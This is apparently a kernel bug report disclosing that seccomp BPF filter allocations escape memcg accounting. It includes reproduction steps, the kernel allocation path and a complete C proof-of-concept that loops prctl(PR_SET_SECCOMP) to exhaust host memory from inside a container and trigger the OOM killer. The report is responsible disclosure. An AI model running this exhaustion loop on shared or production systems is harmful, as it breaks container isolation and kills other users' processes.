Hello,

I found that a program can consume far more memory than its memcg limit
by installing BPF filters repeatedly. This is because the allocations
made while installing a BPF filter are not charged to the memcg.

Here is how I reproduced it:

1. Run the Linux kernel in a QEMU virtual machine (x86_64) with 1GB of
   physical memory. The kernel is built with memcg and memcg kmem
   accounting enabled.

2. Create a docker (runC) container with a 100MB memory limit:

       docker run --name debian --memory 100000000 --kernel-memory 50000000 \
           debian:slim /bin/bash

3. In the container, run a program that installs BPF filters in a loop.
   I use prctl to install them:

       while (1) {
           prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &bpf);
       }

4. Physical memory usage (as reported by `free` or `top`) increases by
   around 40MB, but the memory usage of the container's memcg barely
   increases (around 100KB).

5. Run several such processes, and almost all physical memory is
   consumed. Sometimes processes outside the container are also killed
   by the OOM killer.

I also tried this with user namespaces enabled, and I could still get
host processes killed from inside the container this way. So this
problem may be dangerous for containers that are based on cgroups.

kernel version: 5.3.6
kernel configuration: in attachment (CONFIG_MEMCG_KMEM is on)

This blog post also describes the problem:
https://blog.xiexun.tech/break-memcg.html

Cause of this problem:

Memory allocations made while installing a BPF filter are not charged to
the memcg. For example, kernel/bpf/core.c:bpf_prog_alloc calls
bpf_prog_alloc_no_stats and alloc_percpu_gfp to allocate memory, but
neither allocation is charged to the memcg. So by triggering this path
many times, we can consume a lot of memory without increasing our memcg
usage.

/* ------------ */
struct bpf_prog *bpf_prog_alloc(unsigned int size, gfp_t gfp_extra_flags)
{
	gfp_t gfp_flags = GFP_KERNEL | __GFP_ZERO | gfp_extra_flags;
	struct bpf_prog *prog;
	int cpu;

	prog = bpf_prog_alloc_no_stats(size, gfp_extra_flags);
	if (!prog)
		return NULL;

	prog->aux->stats = alloc_percpu_gfp(struct bpf_prog_stats, gfp_flags);

	/* ... */
}
/* ------------ */

My program that sets BPF:

/* ------------ */
#include <unistd.h>
#include <sys/prctl.h>
#include <linux/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <linux/audit.h>
#include <linux/signal.h>
#include <sys/ptrace.h>
#include <stdio.h>
#include <errno.h>

int main(void)
{
	/* One-instruction filter: 0x6 is BPF_RET | BPF_K, so every syscall
	 * is allowed. */
	struct sock_filter insns[] = {
		{ .code = 0x6, .jt = 0, .jf = 0, .k = SECCOMP_RET_ALLOW }
	};
	struct sock_fprog bpf = { .len = 1, .filter = insns };
	int count = 0;
	int ret;

	/* Needed so an unprivileged process may install a seccomp filter. */
	ret = prctl(PR_SET_NO_NEW_PRIVS, 1, NULL, 0, 0);
	if (ret) {
		printf("error1 %d\n", errno);
		return 1;
	}

	/* Each successful call makes the kernel allocate a new BPF program. */
	while (1) {
		ret = prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &bpf);
		if (ret) {
			/* Report errno before sleep() has a chance to change it. */
			printf("error %d\n", errno);
			sleep(1);
		} else {
			count++;
			printf("ok %d\n", count);
		}
	}
	return 0;
}
/* ------------ */

Thanks,
Xie Xun
Attachment:
.config
Description: Binary data